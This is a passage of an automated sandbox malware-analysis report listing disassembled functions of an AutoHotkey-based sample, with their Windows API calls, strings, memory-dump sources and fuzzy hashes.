Instruction Fuzzy Hash: ED314B75908384ABD730D7548C82BFB77D99BC9300F44496EE588973C3E17968458BAA

Function 0046BB60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0046BBE7
DestroyCursor.USER32(?), ref: 0046BBF3

Strings

0, xrefs: 0046BBC1

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CursorDeleteDestroyObject
String ID: 0
API String ID: 1476932828-4108050209
Opcode ID: c0c87a4c36ba3a5026264bfbf58fefd3d2ed202baee992591e62915c306c6121
Instruction ID: e432880d52172000c963693d8696351a7b3aeb47f89587c284965c1c52b69999
Opcode Fuzzy Hash: c0c87a4c36ba3a5026264bfbf58fefd3d2ed202baee992591e62915c306c6121
Instruction Fuzzy Hash: 063149B25002419FD720DF5AD8C482BBBE8FB49344B14863EE549CB711E735ED84CB9A

Function 0042F130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0042F1BA

Strings

--->, xrefs: 0042F1A4
Line#, xrefs: 0042F17E

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: Line#$--->
API String ID: 2961919466-1677359465
Opcode ID: d924c3d66972fc019a8f6a380d2389671ad9d76148dbf9159ae21b79d1e2f5d7
Instruction ID: 9812a3c3d44631a1ab57cc1fb14d26f5e81a7dcbdfea96b6abd312799f2bec4a
Opcode Fuzzy Hash: d924c3d66972fc019a8f6a380d2389671ad9d76148dbf9159ae21b79d1e2f5d7
Instruction Fuzzy Hash: A4218DB13082129BD318CE69FC80B3B76E5ABC8740FD4047EE845C7345E669EC1D836A

Function 0043B670 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043B6B5
SendMessageA.USER32(?,0000000C,00000000,00000000), ref: 0043B76D

Strings

Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script., xrefs: 0043B6AB

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID: Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.
API String ID: 3850602802-1556141417
Opcode ID: 42df02388e4cbcff10fa1f57e4eaec0959d78a773a79da96126a8407cd1ff3a5
Instruction ID: 7b3c0e5d893460d37df9a94ab7ad1ece93eb40a8c50e6326b5164f7d6a7a34df
Opcode Fuzzy Hash: 42df02388e4cbcff10fa1f57e4eaec0959d78a773a79da96126a8407cd1ff3a5
Instruction Fuzzy Hash: E12104714082818BE620EB14EC41BABB358EBC9B00F54293FE651872A1C76DAC0997CF

Function 00414940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

__snprintf.LIBCMT ref: 004149A4

Strings

10.0.19045, xrefs: 0041498E
%u.%u.%u, xrefs: 00414987

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __snprintf
String ID: %u.%u.%u$10.0.19045
API String ID: 2633826957-4060445884
Opcode ID: a3568a6283e85dd6654bb2da833ddd4a1378e1a684444dad0185ebe9e7e927d6
Instruction ID: 92c2e743539b5a18dabc196deb1ebf4ddbc9c51341d9228b25144441d3336d3d
Opcode Fuzzy Hash: a3568a6283e85dd6654bb2da833ddd4a1378e1a684444dad0185ebe9e7e927d6
Instruction Fuzzy Hash: 9B3171F055A281AED720DBE4AC81BA73F98A7A3344F34017BD055873A1D3AD48CD932E

Function 00456BA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 00456BFE

Strings

No valid COM object!, xrefs: 00456BEC, 00456C7C
0x%08X - , xrefs: 00456BF8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _sprintf
String ID: 0x%08X - $No valid COM object!
API String ID: 1467051239-3183848664
Opcode ID: 6f6557f3d11d21c613d5f7f110003f5ac09709d17dfa2ae0078fe9a281b59970
Instruction ID: d7a7cebee9f2ea0060ac538cb7bee7312917c2b0dc637cb77c542e215ea2d9ef
Opcode Fuzzy Hash: 6f6557f3d11d21c613d5f7f110003f5ac09709d17dfa2ae0078fe9a281b59970
Instruction Fuzzy Hash: 77112C7570035066D720AAB89CC4F6726699BC4755F85453EBE45CB182D6ACEC08C368

Function 00418060 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0041806B

Part of subcall function 0048828D: __mbsnbicmp_l.LIBCMT ref: 0048829D

Strings

<>=/|^,:*&~!()[]{}+-?."'\;`, xrefs: 00418097
Class, xrefs: 00418065

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign__mbsnbicmp_l
String ID: <>=/|^,:*&~!()[]{}+-?."'\;`$Class
API String ID: 3053643802-400929710
Opcode ID: 98572f66ce0016939c4591a904773f37c9ec53b33e3cad8e3d55af7488dbdb29
Instruction ID: 0dce071905be3cb5da21afde9c09aeca155ffdbfce6d2e930ebb005205855c9d
Opcode Fuzzy Hash: 98572f66ce0016939c4591a904773f37c9ec53b33e3cad8e3d55af7488dbdb29
Instruction Fuzzy Hash: E30145326086490ED72186383C007EB3FC55B96300F0E41ABD894CB305EA0C8DCFC69A

Function 004171C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004171EE

Strings

AutoHotkey, xrefs: 00417211
0, xrefs: 00417209

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset
String ID: 0$AutoHotkey
API String ID: 2102423945-2935253169
Opcode ID: 56cf9420870b5f237b395c5b35073c3cc49271c87f99f8c19e0d85e358ee02ea
Instruction ID: 31fb9d5db632e5f4af93b015b50441cbeec32d3c221c7c536ae7bec16dd68563
Opcode Fuzzy Hash: 56cf9420870b5f237b395c5b35073c3cc49271c87f99f8c19e0d85e358ee02ea
Instruction Fuzzy Hash: 51114070A4C3007AE310AF159C42F57BFE8DB81B14F50412EF6185A2C1D7B5554187EE

Function 00451369 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00451377

Strings

Alt, xrefs: 004513A3
DISPLAY, xrefs: 004513C5

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: RectWindow
String ID: Alt$DISPLAY
API String ID: 861336768-3373350543
Opcode ID: 61476530878e1b25dd1f48703d461a7793041078340c98373dc7064cab3c6ced
Instruction ID: ae7db2dbbca7187ef45e8360c046410fcb38b27e20be3e8f04b4d2da1cf602b0
Opcode Fuzzy Hash: 61476530878e1b25dd1f48703d461a7793041078340c98373dc7064cab3c6ced
Instruction Fuzzy Hash: EA0148722043006AE710DE209C41FBF7B989BA0781F10452BFD509A6A3E37CE94D879A

Function 00451435 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 00451488

Strings

RGB, xrefs: 0045144F
0x%06X, xrefs: 00451482

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _sprintf
String ID: 0x%06X$RGB
API String ID: 1467051239-1681201552
Opcode ID: acfdbf9340cf6025eb639978d05723a035bddb9484c0e626491eaf47e477b9cb
Instruction ID: 33f87fe1680fb87d9aaab64bd7095b86db1b11a6c23f103e2413b7f51ccc07de
Opcode Fuzzy Hash: acfdbf9340cf6025eb639978d05723a035bddb9484c0e626491eaf47e477b9cb
Instruction Fuzzy Hash: 1E01496278431036E614B2A81C42FBB7684CBC6B16F508B2FFA54D62D2C5DCE50D937E

Function 00497401 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0048CD8F: __getptd.LIBCMT ref: 0048CD9B
Part of subcall function 0048CD8F: _abort.LIBCMT ref: 0048CDBD

___TypeMatch.LIBCMT ref: 00497448

Strings

0@J, xrefs: 00497427
csm, xrefs: 00497465

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MatchType__getptd_abort
String ID: 0@J$csm
API String ID: 4000028418-1529415693
Opcode ID: 30195903f299c02a29416eb4ad2a83a82dc9388440fd3569cd33632813dc7284
Instruction ID: 87c590e7d887dde5ebf2eb254f2c75ff487b44bbcc369823fb774b126646adb7
Opcode Fuzzy Hash: 30195903f299c02a29416eb4ad2a83a82dc9388440fd3569cd33632813dc7284
Instruction Fuzzy Hash: 1B011B71A18249AFCF00EFA9C481A9DBFB8EF14318B5484B6ED44D7303D235E9458B69

Function 00456C27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_vswprintf_s.LIBCMT ref: 00456C60

Strings

Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d, xrefs: 00456C57
No valid COM object!, xrefs: 00456C7C

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _vswprintf_s
String ID: Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d$No valid COM object!
API String ID: 677850445-394948597
Opcode ID: 46490803a58ae434409be8d34e3f3bce3373ffa23d4f675cfd6d533dee1e3d77
Instruction ID: 9b823eae914598b8cc296b935ca1bac31fd6478dba1566c6391cb8522511a70d
Opcode Fuzzy Hash: 46490803a58ae434409be8d34e3f3bce3373ffa23d4f675cfd6d533dee1e3d77
Instruction Fuzzy Hash: 8801D6B56043409BD721EBB4DC84B567BA8EB88305F848C6AED8587246C67CD508C775

Function 0045E538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0045E571
SendMessageA.USER32(?,00000080,00000001), ref: 0045E57F

Strings

=, xrefs: 0045E53B

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID: =
API String ID: 3850602802-2322244508
Opcode ID: d167590260d02064f220eaf82eb03aefd16dbeeaca9d7d062278c0b49311f0f5
Instruction ID: 909c6866d3b1487340e388b9e03d3a21afdf6912bc751b28605e190980ccc543
Opcode Fuzzy Hash: d167590260d02064f220eaf82eb03aefd16dbeeaca9d7d062278c0b49311f0f5
Instruction Fuzzy Hash: 29F0F6716443807FD724CA658C86F973F68EB86B14F40061DF5955B2D2D6699805C324

Function 0041494E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

__snprintf.LIBCMT ref: 004149A4

Strings

10.0.19045, xrefs: 0041498E
%u.%u.%u, xrefs: 00414987

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __snprintf
String ID: %u.%u.%u$10.0.19045
API String ID: 2633826957-4060445884
Opcode ID: a60150180a0cff0e4e5c4b8c72a7ce0a1fce83401830a2b11b84846534929097
Instruction ID: ad067af34fadfd06f3394f75ba4368a38b9da6d31f92bf64cad9071fbf251451
Opcode Fuzzy Hash: a60150180a0cff0e4e5c4b8c72a7ce0a1fce83401830a2b11b84846534929097
Instruction Fuzzy Hash: 32014CF1A56241AAD314DFE4AC81B673EA8B796304B20013FE014873A5D3795889871E

Function 00417600 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00417610
_strncpy.LIBCMT ref: 00417682

Strings

AutoHotkey, xrefs: 00417673, 0041767A

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset_strncpy
String ID: AutoHotkey
API String ID: 3140232205-348589305
Opcode ID: 055b7fb34de9c95e68db52aea1f89657ea0e8b3cc058e3dcc686f8b6e25489bd
Instruction ID: a275a5dddf32db206ba39fb1a5549433625b316877d92300547de6e27a2869d2
Opcode Fuzzy Hash: 055b7fb34de9c95e68db52aea1f89657ea0e8b3cc058e3dcc686f8b6e25489bd
Instruction Fuzzy Hash: A7019EB0648B41AFE760CF39C840BC37BF4AB55344F40042EE56D8B341DB79B9549719

Function 004975E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00496E24: __getptd.LIBCMT ref: 00496E2A
Part of subcall function 00496E24: __getptd.LIBCMT ref: 00496E3A

__getptd.LIBCMT ref: 004975F5

Part of subcall function 0048BF42: __amsg_exit.LIBCMT ref: 0048BF52

__getptd.LIBCMT ref: 00497603

Strings

csm, xrefs: 00497611

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __getptd$__amsg_exit
String ID: csm
API String ID: 1969926928-1018135373
Opcode ID: 19e1946813f02e5745f9991b9e14562a7c923d34bd14ed467d1a99f417b7aae6
Instruction ID: 01055e9a85a2eecdcef74da5c123206ebf05b9a4efa9e7f03abbf399388991c5
Opcode Fuzzy Hash: 19e1946813f02e5745f9991b9e14562a7c923d34bd14ed467d1a99f417b7aae6
Instruction Fuzzy Hash: EA014B34825A048ACF349F29C5406AEBBB5AF60325F14483FE48596351EB398D85EF89

Function 004CB70B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004C6D66: __getptd.LIBCMT ref: 004C6D6C
Part of subcall function 004C6D66: __getptd.LIBCMT ref: 004C6D7C

__getptd.LIBCMT ref: 004CB71A

Part of subcall function 004C7C01: __amsg_exit.LIBCMT ref: 004C7C11

__getptd.LIBCMT ref: 004CB728

Strings

csm, xrefs: 004CB736

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __getptd$__amsg_exit
String ID: csm
API String ID: 1969926928-1018135373
